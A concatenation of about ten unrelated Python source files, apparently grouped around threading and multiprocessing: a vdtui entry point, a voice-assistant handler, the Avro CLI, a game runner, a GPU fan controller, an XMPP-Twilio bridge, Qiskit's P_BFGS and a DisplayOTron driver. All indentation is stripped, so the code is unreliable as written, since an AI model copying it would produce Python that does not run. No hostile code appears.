def wrapper(f, *args):
return curses.wrapper(setupcolors, f, *args)
def run(sheetlist=None):
'Main entry point; launches vdtui with the given sheets already pushed (last one is visible)'
# reduce ESC timeout to 25ms. http://en.chys.info/2009/09/esdelay-ncurses/
if sheetlist is None:
sheetlist = []
os.putenv('ESCDELAY', '25')
ret = wrapper(cursesMain, sheetlist)
if ret:
print(ret)
def cursorEnable(b):
try:
curses.curs_set(1 if b else 0)
except:
pass
def cursesMain(_scr, sheetlist=None):
'Populate VisiData object with sheets from a given list.'
if sheetlist is None:
sheetlist = []
colors.setup()
for vs in sheetlist:
vd().push(vs) # first push does a reload
status('<F1> or z? opens help')
return vd().run(_scr)
def addGlobals(g):
'importers can call `addGlobals(globals())` to have their globals accessible to execstrings'
globals().update(g)
def getGlobals():
return globals()
|
kurisu_functions.py
|
#!/usr/bin/python3
from functions.exchange_rate import keywords_start as exchange_start
from functions.exchange_rate import keywords_response as exchange_res
from functions.exchange_rate import dialog as exchange_dialog
from functions.sound import keywords_start as sound_start
from functions.sound import keywords_response as sound_res
from functions.sound import play_from_url as sound_play_url
from kurisu_utils import *
from threading import Thread
stay_home = False
def commander_start(record):
global stay_home
if not stay_home:
addreses, names = get_near_devices()
for name in names:
if name == "Coconut451":
for addr in addreses:
if addr == "74:04:2B:4E:25:F3":
stay_home = True
print("С возращением дорогой.")
thread_play = Thread(target=sound_play_url , args=((record, engine, "https://storage.lightaudio.ru/39976010/2ea34344/Michael%20McCann%20%E2%80%94%20Home.mp3")))
thread_play.start()
if get_words(record) == "курс": # exchange_start перечисление всех подходящих слов с курсом для начала диалога
exchange_dialog(record, engine)
elif get_words(record) == "подключи": # какие устройства есть рядом
name, addr = get_near_devices()
connect_to_device(name, addr)
else:
print(get_words(record))
print("Я не знаю такой команды")
|
multiclient.py
|
# ----------------------------------------------------------------------
# Copyright (c) 2011-2016 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
# ----------------------------------------------------------------------
import client
import sys
import threading
from datetime import datetime
def main():
threads = []
start = datetime.utcnow()
n = int(sys.argv.pop(1))
for i in range(n):
thread = threading.Thread(target=client.main, args=[sys.argv, False])
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
end = datetime.utcnow()
print 'Time =', end - start
if __name__ == "__main__":
sys.exit(main())
|
tool.py
|
#!/usr/bin/env python
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
from __future__ import absolute_import, division, print_function
import os.path
import sys
import threading
import urlparse
import warnings
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import avro.io
from avro import datafile, ipc, protocol
class GenericResponder(ipc.Responder):
def __init__(self, proto, msg, datum):
proto_json = open(proto, 'rb').read()
ipc.Responder.__init__(self, protocol.parse(proto_json))
self.msg = msg
self.datum = datum
def invoke(self, message, request):
if message.name == self.msg:
print("Message: %s Datum: %s" % (message.name, self.datum), file=sys.stderr)
# server will shut down after processing a single Avro request
global server_should_shutdown
server_should_shutdown = True
return self.datum
class GenericHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.responder = responder
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print("Shutting down server.", file=sys.stderr)
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri, proto, msg, datum):
url_obj = urlparse.urlparse(uri)
server_addr = (url_obj.hostname, url_obj.port)
global responder
global server_should_shutdown
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = HTTPServer(server_addr, GenericHandler)
print("Port: %s" % server.server_port)
sys.stdout.flush()
server.allow_reuse_address = True
print("Starting server.", file=sys.stderr)
server.serve_forever()
def send_message(uri, proto, msg, datum):
url_obj = urlparse.urlparse(uri)
client = ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
proto_json = open(proto, 'rb').read()
requestor = ipc.Requestor(protocol.parse(proto_json), client)
print(requestor.request(msg, datum))
##
# TODO: Replace this with fileinput()
def file_or_stdin(f):
return sys.stdin if f == '-' else open(f, 'rb')
def main(args=sys.argv):
if len(args) == 1:
print("Usage: %s [dump|rpcreceive|rpcsend]" % args[0])
return 1
if args[1] == "dump":
if len(args) != 3:
print("Usage: %s dump input_file" % args[0])
return 1
for d in datafile.DataFileReader(file_or_stdin(args[2]), avro.io.DatumReader()):
print(repr(d))
elif args[1] == "rpcreceive":
usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
run_server(uri, proto, msg, datum)
elif args[1] == "rpcsend":
usage_str = "Usage: %s rpcsend uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
send_message(uri, proto, msg, datum)
return 0
if __name__ == "__main__":
if os.path.dirname(avro.io.__file__) in sys.path:
warnings.warn("Invoking avro/tool.py directly is likely to lead to a name collision with the python io module. Try doing `python -m avro.tool` instead.")
sys.exit(main(sys.argv))
|
__init__.py
|
###############################################################################
# DO NOT MODIFY THIS FILE #
###############################################################################
import inspect
import logging
import sys
import textwrap
import time
from collections import namedtuple
from enum import Enum
from multiprocessing import Process, Pipe
from queue import Empty
from .isolation import Isolation, DebugState
__all__ = ['Isolation', 'DebugState', 'Status', 'play', 'fork_get_action']
logger = logging.getLogger(__name__)
Agent = namedtuple("Agent", "agent_class name")
PROCESS_TIMEOUT = 5 # time to interrupt agent search processes (in seconds)
GAME_INFO = """\
Initial game state: {}
First agent: {!s}
Second agent: {!s}
"""
ERR_INFO = """\
Error playing game: {!s}
Initial state: {}
First agent: {!s}
Second agent: {!s}
Final state: {}
Action history: {!s}
"""
RESULT_INFO = """\
Status: {}
Final State: {}
History: {}
Winner: {}
Loser: {}
"""
class Status(Enum):
NORMAL = 0
EXCEPTION = 1
TIMEOUT = 2
INVALID_MOVE = 3
GAME_OVER = 4
class StopSearch(Exception): pass # Exception class used to halt search
class TimedQueue:
"""Modified queue class to block .put() after a time limit expires,
and to include both a context object & action choice in the queue.
"""
def __init__(self, receiver, sender, time_limit):
self.__sender = sender
self.__receiver = receiver
self.__time_limit = time_limit / 1000
self.__stop_time = None
self.agent = None
def start_timer(self):
self.__stop_time = self.__time_limit + time.perf_counter()
def put(self, item, block=True, timeout=None):
if self.__stop_time and time.perf_counter() > self.__stop_time:
raise StopSearch
if self.__receiver.poll():
self.__receiver.recv()
self.__sender.send((getattr(self.agent, "context", None), item))
def put_nowait(self, item):
self.put(item, block=False)
def get(self, block=True, timeout=None):
return self.__receiver.recv()
def get_nowait(self):
return self.get(block=False)
def qsize(self): return int(self.__receiver.poll())
def empty(self): return ~self.__receiver.poll()
def full(self): return self.__receiver.poll()
def play(args): return _play(*args) # multithreading ThreadPool.map doesn't expand args
def _play(agents, game_state, time_limit, match_id, debug=False):
""" Run a match between two agents by alternately soliciting them to
select a move and applying it to advance the game state.
Parameters
----------
agents : tuple
agents[i] is an instance of isolation.Agent class (namedtuple)
game_state: Isolation
an instance of Isolation.Isolation in the initial game state;
assumes that agents[game_state.ply_count % 2] is the active
player in the initial state
time_limit : numeric
The maximum number of milliseconds to allow before timeout during
each turn (see notes)
Returns
-------
(agent, list<[(int, int),]>, Status)
Return multiple including the winning agent, the actions that
were applied to the initial state, a status code describing the
reason the game ended, and any error information
"""
initial_state = game_state
game_history = []
winner = None
status = Status.NORMAL
players = [a.agent_class(player_id=i) for i, a in enumerate(agents)]
logger.info(GAME_INFO.format(initial_state, *agents))
while not game_state.terminal_test():
active_idx = game_state.player()
# any problems during get_action means the active player loses
winner, loser = agents[1 - active_idx], agents[active_idx]
try:
action = fork_get_action(game_state, players[active_idx], time_limit, debug)
except Empty:
status = Status.TIMEOUT
logger.warn(textwrap.dedent("""\
The queue was empty after get_action() was called. This means that either
the queue.put() method was not called by the get_action() method, or that
the queue was empty after the procedure was killed due to timeout {} seconds
after the move time limit of {} milliseconds had expired.
""".format(players[active_idx], PROCESS_TIMEOUT, time_limit)).replace("\n", " "))
break
except Exception as err:
status = Status.EXCEPTION
logger.error(ERR_INFO.format(
err, initial_state, agents[0], agents[1], game_state, game_history
))
break
if action not in game_state.actions():
status = Status.INVALID_MOVE
break
game_state = game_state.result(action)
game_history.append(action)
else:
status = Status.GAME_OVER
if game_state.utility(active_idx) > 0:
winner, loser = loser, winner # swap winner/loser if active player won
logger.info(RESULT_INFO.format(status, game_state, game_history, winner, loser))
return winner, game_history, match_id
def fork_get_action(game_state, active_player, time_limit, debug=False):
receiver, sender = Pipe()
action_queue = TimedQueue(receiver, sender, time_limit)
if debug: # run the search in the main process and thread
from copy import deepcopy
active_player.queue = None
active_player = deepcopy(active_player)
active_player.queue = action_queue
_request_action(active_player, action_queue, game_state)
time.sleep(time_limit / 1000)
else: # spawn a new process to run the search function
try:
p = Process(target=_request_action, args=(active_player, action_queue, game_state))
p.start()
p.join(timeout=PROCESS_TIMEOUT + time_limit / 1000)
finally:
if p and p.is_alive(): p.terminate()
new_context, action = action_queue.get_nowait() # raises Empty if agent did not respond
active_player.context = new_context
return action
def _request_action(agent, queue, game_state):
""" Augment agent instances with a countdown timer on every method before
calling the get_action() method and catch countdown timer exceptions.
"""
agent.queue = queue
queue.agent = agent
try:
queue.start_timer()
agent.get_action(game_state)
except StopSearch:
pass
|
gpu_ctl.py
|
#!/usr/bin/env python3
import os
import sys
import time
import re
import syslog
import argparse
import subprocess as sb
from threading import Thread
import pynvml as nv
from gpuctl import logger
from gpuctl import PciDev, GpuAMD, GpuNV
from gpuctl import FileVarMixn as fv
from gpuctl import ShellCmdMixin as sc
__all__ = ['GpuCtl']
class GpuCtl():
INTERVAL = 5
WAIT_PERIOD = 120
def __init__(self, **kwargs):
self.vendors = None
# overwrite default value with arguments
valid_keys = ["gpu_devices",
"fan", "curve", "delta", "temp", "tas", "verbose"]
for k in kwargs.keys():
if k not in valid_keys:
return None
for key in valid_keys:
setattr(self, key, kwargs.get(key))
self.thread = None
self.abort = False
# if curve is set, apply curve to all GPUs
if self.curve:
for gpu_dev in self.gpu_devices:
gpu_dev.set_curve(self.curve)
# temp
self.gpu_dict = {}
# fan
# self.fan_ctrl_flag = False
# action script
self.interval = GpuCtl.INTERVAL
self.wait = GpuCtl.WAIT_PERIOD
for gpu in self.gpu_devices:
gpu.prev_temp = None
gpu.fan_ctrl_flag = False
def _fan_control(self, gpu, t):
if t and not gpu.fan_ctrl_flag and (self.fan and t > self.fan):
logger.debug(f'[{gpu.pci_dev.slot_name}/{gpu.name}] fan control is activated')
gpu.fan_ctrl_flag = True
if not gpu.fan_ctrl_flag:
return
speed = gpu.temp_to_speed(t)
ptemp = gpu.prev_temp
# if pwm change more than delta percentage, then do action
if (ptemp == None or abs(t - ptemp) > gpu.temp_delta):
logger.info(
f"[{gpu.pci_dev.slot_name}/{gpu.name}] current temp. {t}c set speed {speed}%")
gpu.set_speed(speed)
gpu.prev_temp = t
def _failure_action(self, gpu, t):
if self.tas:
try:
msg = f"[{gpu.pci_dev.slot_name}/{gpu.name}] over temperature {self.temp}c, exec {self.tas}"
logger.warning(msg)
syslog.syslog(syslog.LOG_WARNING, msg)
rv = sc.exec_script(self.tas, params=gpu.pci_dev.slot_name)
if self.verbose:
logger.debug(f"[{gpu.pci_dev.slot_name}/{gpu.name}] result: {rv.decode('utf-8')}")
except:
msg = f"[{gpu.pci_dev.slot_name}/{gpu.name}] over temperature, exec {self.tas} failed !!"
logger.error(msg)
syslog.syslog(syslog.LOG_ERR, msg)
else:
msg = f"[{gpu.pci_dev.slot_name}/{gpu.name}] over temperature {self.temp}c, no script defined"
logger.warning(msg)
syslog.syslog(syslog.LOG_WARNING, msg)
def update(self, gpu, t, set_flag=False):
cur_temp = gpu.get_temperature()
fan_speed = gpu.get_speed()
if set_flag == True:
self.gpu_dict[gpu] = {'time': t, 'temp': cur_temp, 'fan':fan_speed}
return self.gpu_dict[gpu]
if self.gpu_dict.get(gpu):
if cur_temp != None and self.temp != None and cur_temp < self.temp:
self.gpu_dict[gpu] = {'time': t, 'temp': cur_temp, 'fan':fan_speed}
else:
self.gpu_dict[gpu]['temp'] = cur_temp
self.gpu_dict[gpu]['fan'] = fan_speed
else:
self.gpu_dict[gpu] = {'time': t, 'temp': cur_temp, 'fan':fan_speed}
return self.gpu_dict[gpu]
def _gpu_thread(self):
syslog.syslog(syslog.LOG_INFO, 'started.')
logger.info(f"query intervel: {self.interval} wait-time: {self.wait}")
logger.info(f"temperature threshold: {self.temp}")
logger.info(f"fan control threshold: {self.fan}")
logger.info(f"script: {self.tas}")
print('\n')
while self.abort != True:
time.sleep(self.interval)
t = time.time()
for gpu in self.gpu_devices:
tt = self.update(gpu, t)
if self.verbose:
rem = self.wait - int(t-tt['time'])
logger.debug(f"[{gpu.pci_dev.slot_name}/{gpu.name}] temperature {tt['temp']}c fan {tt['fan']}% ({rem}s)")
# fan speed
self._fan_control(gpu, tt['temp'])
# action scripts
if (t - tt['time']) > self.wait:
self._failure_action(gpu, tt['temp'])
tt = self.update(gpu, t, set_flag=True)
syslog.syslog(syslog.LOG_INFO, 'stopped.')
def add_gpu_devices(self, gpu_devices):
cnt = 0
for gpu in gpu_devices:
dup_flag = False
for g in self.gpu_devices:
if gpu.pci_dev.slot_name == g.pci_dev.slot_name:
dup_flag = True
logger.debug(f'duplicate slot {gpu.pci_dev.slot_name}')
break
if not dup_flag:
cnt += 1
self.gpu_devices.append(gpu)
return cnt
def start(self):
if len(self.gpu_devices) == 0:
logger.error('No GPU found !!!')
return
self.thread = Thread(target=self._gpu_thread)
self.thread.start()
def stop(self):
logger.info("exit")
self.abort = True
self.thread.join()
def set_interval(self, intvl=None, wait_period=None):
"""
wait interval must greater than interval
"""
interval = intvl if intvl else self.interval
wait_period = wait_period if wait_period else self.wait
if interval <= 0 or wait_period < interval:
logger.error(f'invalid intervals {intvl} {wait_period} !!!')
return False
self.interval = interval
self.wait = wait_period
return True
if __name__ == '__main__':
pci_devices = PciDev.discovery()
gpu_devices = []
for pdev in pci_devices:
gpu_dev = None
if pdev and pdev.is_amd():
gpu_dev = GpuAMD(pdev)
if pdev and pdev.is_nvidia():
gpu_dev = GpuNV(pdev)
# remove duplicate gpu
if gpu_dev and gpu_dev.is_gpu():
gpu_devices.append(gpu_dev)
|
xmpp.py
|
import ctypes
import importlib
import multiprocessing
import queue
import time
import twilio.base.values
import twilio.rest
import slixmpp
import vbx
import vbx.util
class XMPPComponent:
class SlixmppComponent(slixmpp.ComponentXMPP):
def __init__(self, jid, secret, server, port, target, twilio_queue, timeout, target_online, running):
self.target = target
self.twilio_queue = twilio_queue
self.timeout = timeout
self.target_online = target_online
self.running = running
super().__init__(jid, secret, server, port)
def run(self):
self.schedule('Check Running', self.timeout, self.check_running, repeat=True)
self.register_plugin('xep_0030') # service discovery
self.register_plugin('xep_0004') # data forms
self.register_plugin('xep_0060') # pubsub
self.register_plugin('xep_0199') # ping
self.register_plugin('xep_0172') # nick
self.add_event_handler('session_start', self.session_start)
self.add_event_handler('disconnect', self.reconnect)
self.add_event_handler('got_offline', self.set_offline)
self.add_event_handler('got_online', self.set_online)
self.add_event_handler('message', self.recv_from_xmpp)
self.schedule('Check Twilio Queue', self.timeout, self.check_twilio, repeat=True)
self.connect()
self.process(forever=True)
def check_running(self):
if not self.running.value:
self.loop.stop()
def session_start(self, data):
self.vbx_config = importlib.import_module('vbx.config')
self.twilio_client = twilio.rest.Client(username=self.vbx_config.auth[0], password=self.vbx_config.auth[1])
self.send_presence_subscription(self.target)
def reconnect(self, data):
while not self.connect():
time.sleep(5)
def set_offline(self, presence):
if presence['from'].bare != self.target:
return
self.target_online.value = 0
def set_online(self, presence):
if presence['from'].bare != self.target:
return
self.target_online.value = 1
for number, name in self.vbx_config.contacts.items():
self.send_presence(pto=self.target, pfrom=number + '@' + self.boundjid.domain, pnick=name, ptype='available')
def recv_from_xmpp(self, msg):
if not self.vbx_config:
return
if msg['from'].bare != self.target:
return
to = msg['to'].node
body, media_url = vbx.util.get_split_media(msg['body'])
self.twilio_client.messages.create(to, body=body, from_=self.vbx_config.number, media_url=media_url)
def _send_from_twilio(self, event, msg):
if not self.vbx_config:
return
from_ = event.from_ + '@' + self.boundjid.domain
if msg:
self.send_message(self.target, msg, mfrom=from_)
if event.media_url:
self.send_message(self.target, 'Media: ' + event.media_url, mfrom=from_)
def check_twilio(self):
try:
self._send_from_twilio(*self.twilio_queue.get_nowait())
except queue.Empty:
pass
def __init__(self, jid, secret, server, port, target, timeout=0.5):
self.jid = jid
self.secret = secret
self.server = server
self.port = port
self.target = target
self.timeout = timeout
self.twilio_queue = multiprocessing.Queue()
self.target_online = multiprocessing.Value(ctypes.c_bool)
self.running = multiprocessing.Value(ctypes.c_bool)
def run(self):
self.component = self.SlixmppComponent(self.jid, self.secret, self.server, self.port, self.target, self.twilio_queue, self.timeout, self.target_online, self.running)
self.running.value = True
self.component.run()
def stop(self):
self.running.value = False
def send_from_twilio(self, event, msg):
self.twilio_queue.put((event, msg))
def online(self):
return self.target_online.value > 0
class XMPP(vbx.Device):
def __init__(self, jid, secret, server, port, target):
self.component = XMPPComponent(jid, secret, server, port, target)
def start(self):
self.process = multiprocessing.Process(target=self.component.run, name='XMPPComponent')
self.process.start()
def stop(self):
self.component.stop()
def online(self):
return self.component.online()
def send(self, event, message, response):
self.component.send_from_twilio(event, message)
|
p_bfgs.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Parallelized Limited-memory BFGS optimizer"""
from typing import Optional
import multiprocessing
import platform
import logging
import numpy as np
from scipy import optimize as sciopt
from qiskit.utils import algorithm_globals
from qiskit.utils.validation import validate_min
from .optimizer import Optimizer, OptimizerSupportLevel
logger = logging.getLogger(__name__)
class P_BFGS(Optimizer): # pylint: disable=invalid-name
"""
Parallelized Limited-memory BFGS optimizer.
P-BFGS is a parallelized version of :class:`L_BFGS_B` with which it shares the same parameters.
P-BFGS can be useful when the target hardware is a quantum simulator running on a classical
machine. This allows the multiple processes to use simulation to potentially reach a minimum
faster. The parallelization may also help the optimizer avoid getting stuck at local optima.
Uses scipy.optimize.fmin_l_bfgs_b.
For further detail, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
_OPTIONS = ["maxfun", "factr", "iprint"]
# pylint: disable=unused-argument
def __init__(
self,
maxfun: int = 1000,
factr: float = 10,
iprint: int = -1,
max_processes: Optional[int] = None,
) -> None:
r"""
Args:
maxfun: Maximum number of function evaluations.
factr : The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,
\|f\^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint: Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and \|proj g\| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes: maximum number of processes allowed, has a min. value of 1 if not None.
"""
if max_processes:
validate_min("max_processes", max_processes, 1)
super().__init__()
for k, v in list(locals().items()):
if k in self._OPTIONS:
self._options[k] = v
self._max_processes = max_processes
def get_support_level(self):
"""return support level dictionary"""
return {
"gradient": OptimizerSupportLevel.supported,
"bounds": OptimizerSupportLevel.supported,
"initial_point": OptimizerSupportLevel.required,
}
def optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
num_procs = multiprocessing.cpu_count() - 1
num_procs = (
num_procs if self._max_processes is None else min(num_procs, self._max_processes)
)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == "Darwin":
# Changed in version 3.8: On macOS, the spawn start method is now the
# default. The fork start method should be considered unsafe as it can
# lead to crashes.
# However P_BFGS doesn't support spawn, so we revert to single process.
major, minor, _ = platform.python_version_tuple()
if major > "3" or (major == "3" and minor >= "8"):
num_procs = 0
logger.warning(
"For MacOS, python >= 3.8, using only current process. "
"Multiple core use not supported."
)
elif platform.system() == "Windows":
num_procs = 0
logger.warning(
"For Windows, using only current process. " "Multiple core use not supported."
)
queue = multiprocessing.Queue()
# bounds for additional initial points in case bounds has any None values
threshold = 2 * np.pi
if variable_bounds is None:
variable_bounds = [(-threshold, threshold)] * num_vars
low = [(l if l is not None else -threshold) for (l, u) in variable_bounds]
high = [(u if u is not None else threshold) for (l, u) in variable_bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(
num_vars, objective_function, gradient_function, variable_bounds, _i_pt
)
_queue.put((_sol, _opt, _nfev))
# Start off as many other processes running the optimize (can be 0)
processes = []
for _ in range(num_procs):
i_pt = algorithm_globals.random.uniform(low, high) # Another random point in bounds
proc = multiprocessing.Process(target=optimize_runner, args=(queue, i_pt))
processes.append(proc)
proc.start()
# While the one _optimize in this process below runs the other processes will
# be running to. This one runs
# with the supplied initial point. The process ones have their own random one
sol, opt, nfev = self._optimize(
num_vars, objective_function, gradient_function, variable_bounds, initial_point
)
for proc in processes:
# For each other process we wait now for it to finish and see if it has
# a better result than above
proc.join()
p_sol, p_opt, p_nfev = queue.get()
if p_opt < opt:
sol, opt = p_sol, p_opt
nfev += p_nfev
return sol, opt, nfev
def _optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
super().optimize(
num_vars, objective_function, gradient_function, variable_bounds, initial_point
)
approx_grad = bool(gradient_function is None)
sol, opt, info = sciopt.fmin_l_bfgs_b(
objective_function,
initial_point,
bounds=variable_bounds,
fprime=gradient_function,
approx_grad=approx_grad,
**self._options,
)
return sol, opt, info["funcalls"]
|
spawn.py
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,\
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A wrapper around multiprocessing to be compatible at google."""
import contextlib
import multiprocessing
import queue
Empty = queue.Empty
multiprocessing.set_start_method("fork")
# For compatibility so that it works inside Google.
@contextlib.contextmanager
def main_handler():
yield
class Process(object):
"""A wrapper around `multiprocessing` that allows it to be used at google.
It spawns a subprocess from the given target function. That function should
take an additional argument `queue` which will get a bidirectional
_ProcessQueue for communicating with the parent.
"""
def __init__(self, target, args=(), kwargs=None):
if kwargs is None:
kwargs = {}
elif "queue" in kwargs:
raise ValueError("`queue` is reserved for use by `Process`.")
q1 = multiprocessing.Queue()
q2 = multiprocessing.Queue()
self._queue = _ProcessQueue(q1, q2)
kwargs["queue"] = _ProcessQueue(q2, q1)
self._process = multiprocessing.Process(
target=target, args=args, kwargs=kwargs)
self._process.start()
def join(self, *args):
return self._process.join(*args)
@property
def exitcode(self):
return self._process.exitcode
@property
def queue(self):
return self._queue
class _ProcessQueue(object):
"""A bidirectional queue for talking to a subprocess.
`empty`, `get` and `get_nowait` act on the incoming queue, while
`full`, `put` and `put_nowait` act on the outgoing queue.
This class should only be created by the Process object.
"""
def __init__(self, q_in, q_out):
self._q_in = q_in
self._q_out = q_out
def empty(self):
return self._q_in.empty()
def full(self):
return self._q_out.full()
def get(self, block=True, timeout=None):
return self._q_in.get(block=block, timeout=timeout)
def get_nowait(self):
return self.get(False)
def put(self, obj, block=True, timeout=None):
return self._q_out.put(obj, block=block, timeout=timeout)
def put_nowait(self, obj):
return self.put(obj, False)
|
dothat_driver.py
|
#!/usr/bin/env python
"""
Display-o-Tron hat driver using threading to drive the lights
and text on different update frequencies. Text data from InterfaceData.py.
Adapted from the example code at https://github.com/pimoroni/dot3k
This version incorporates python threading to run both
the lights update loop and the text update loop independently.
Commented code is as yet, untested.
"""
import sys
import time
import signal
import threading
#import dothat.lcd as lcd
from InterfaceData import DotHatInfo
#Define an explicit signal handler
#intent is to use this to catch SIGINT
def signal_handler(signal, frame):
"""
dothat code is currently block commented.
print statement to show updates in testing.
"""
print('INFO: SIGINT/Ctrl+C received! Cleaning up.')
#End the program with a static message
# lcd.set_cursor_position(0, 0)
# lcd.write(message[:16])
# lcd.set_cursor_position(0, 1)
# lcd.write(message[16:32])
# lcd.set_cursor_position(0, 2)
# lcd.write(message[32:])
#slowly dim the 18 backlights (6 x (r+g+b)) on the way out
# for i in range(19):
# backlight.set(i,30) #0-255
# time.sleep(0.3)
# #slowly raise and then drop the bargraph leds
# for i in range(6):
# time.sleep(0.5)
# backlight.graph_set_led_state(led, 1)
# for i in range(6):
# time.sleep(0.5)
# backlight.graph_set_led_state(led, 0)
sys.exit(0)
def _write_screen(line1, line2, line3):
"""
This is untested until my dothat arrives.
"""
lcd.set_cursor_position(0, 0)
lcd.write(line1)
lcd.set_cursor_position(0, 1)
lcd.write(line2)
lcd.set_cursor_position(0, 2)
lcd.write(line3)
def _fake_write_screen(line1, line2, line3):
"""
Temp replacement for _write_screen.
"""
print("****************")
print(line1)
print(line2)
print(line3)
print("****************")
def run_lights():
"""
dothat code is currently block commented.
print statement to show updates in testing.
"""
# #initialize loop counter.
# x = 0
while True:
# x += 3
# x %= 360
print("run_lights_update")
# #Set the backlight brightness for the 6 leds x 3 colors each
# #brightness is 0-255
# for i in range(19):
# backlight.set(i,255)
#
# #Set the backlight 6 led gradient, which we will update
# #as x goes from 3 to 360 in increments of 3 (120 steps)
# backlight.sweep((360.0 - x) / 360.0)
#
# #Set the bar graph led which will oscillate slowly up and down
# backlight.set_graph(abs(math.sin(x / 100.0)))
#
# #led loop update rate
time.sleep(0.1)
def run_text():
"""
dothat code is currently block commented.
print statement to show updates in testing.
"""
#Create the data source object
dot3kdata = DotHatInfo()
while True:
#Grab a three line tuple of time/data data and print
(line1, line2, line3) = dot3kdata.time_date()
#_write_screen(line1, line2, line3)
_fake_write_screen(line1, line2, line3)
time.sleep(2)
#Grab a three line tuple of disk data and print
(line1, line2, line3) = dot3kdata.disk_info()
#_write_screen(line1, line2, line3)
_fake_write_screen(line1, line2, line3)
time.sleep(2)
#Grab a three line tuple of mem data and print
(line1, line2, line3) = dot3kdata.mem_info()
#_write_screen(line1, line2, line3)
_fake_write_screen(line1, line2, line3)
time.sleep(2)
#Grab a three line tuple of network data and print
(line1, line2, line3) = dot3kdata.network_ok()
#_write_screen(line1, line2, line3)
